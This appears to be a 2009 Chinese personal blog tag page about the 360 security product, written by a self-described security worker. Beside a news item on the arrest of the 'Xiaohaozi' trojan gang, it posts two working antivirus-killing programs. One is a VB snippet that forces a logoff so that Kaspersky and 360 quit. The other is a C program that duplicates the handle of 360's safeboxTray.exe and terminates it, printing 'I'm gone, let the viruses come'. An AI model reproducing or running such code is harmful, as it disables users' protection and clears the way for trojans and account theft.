2个K掉360的代码
2009年9月19日
没有评论 453 views
在JKS上看到的,代码如下:
存档
文章标签 ‘360’
360披露与网警跨省追捕端掉小耗子木马团伙
2009年7月27日
没有评论 103 views
奇虎今日透露,湖北省麻城市网警在360安全中心的协助下,从一起网吧攻击敲诈案入手,将涉嫌制作、传播、并滥施网络暴力的整个“小耗子”木马团伙连根拔起,4名主犯相继在湖北、山东、江西、河北四省被捕.
据360安全专家石晓虹博士介绍,“小耗子”是一款极具攻击性的下载器类型木马,专门负责“干掉”杀毒软件,并源源不断地运送各种盗号木马进入受害用户电 脑,相当于盗号木马的分发渠道和“保镖”,主要以向网游盗号工作室收取 “入门费”牟利.今年4月360安全中心曾曝光“小耗子”的统计后台,当时的中招电脑就达到65497台,而这仅仅是代理“小耗子”传播业务的一个“菜鸟 黑客”的成绩.
据悉,“小耗子”的作者小M是江西省的一名20岁青年,仅有高中学历,但由于黑客社区的技术共享极为方便,他编写木马的技巧也与日俱增,因此受到不少商业盗号组织的青睐,每天收益在6000元以上.
阅读全文...
两句代码使卡巴、360自动退出
2009年6月25日
没有评论 114 views
两句代码使卡巴、360自动退出
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Command1_Click()
ExitWindowsEx 0, 0 '通过注销系统让反病毒软件自动退出
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
If UnloadMode = 2 Then Cancel = True
End Sub
Kill 360Safe 完整版(VC版)
2009年6月25日
没有评论 261 views
Kill 360Safe 完整版(VC版)
复制内容到剪贴板代码:
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
unsigned long getprocid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe;
hnd=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(pe);
b=Process32First(hnd,&pe);
while(b)
{
if(strcmp(pn,pe.szExeFile)==0)return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
}
return 0;
}
int main()
{
HMODULE hNTDLL = GetModuleHandle("ntdll.dll");
void (WINAPI *ZwDuplicateObject) (DWORD,HANDLE,DWORD,PHANDLE,unsigned long,unsigned long,unsigned long);
(FARPROC&)ZwDuplicateObject= GetProcAddress(hNTDLL,"ZwDuplicateObject");
DWORD pid=0;
pid=getprocid("safeboxTray.exe");
if(pid==0)
{
printf("找不到360保险箱的进程ID");
}
HANDLE ProcessHandle=OpenProcess(PROCESS_DUP_HANDLE,FALSE,pid);
if(ProcessHandle != NULL)
{
ZwDuplicateObject(-1,ProcessHandle,-1,&ProcessHandle,2035711,0,1);
TerminateProcess(ProcessHandle,0);
printf("我走了,毒来吧\n");
return 1;
}
printf("升级了\n");
return 0;
}
About Me
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论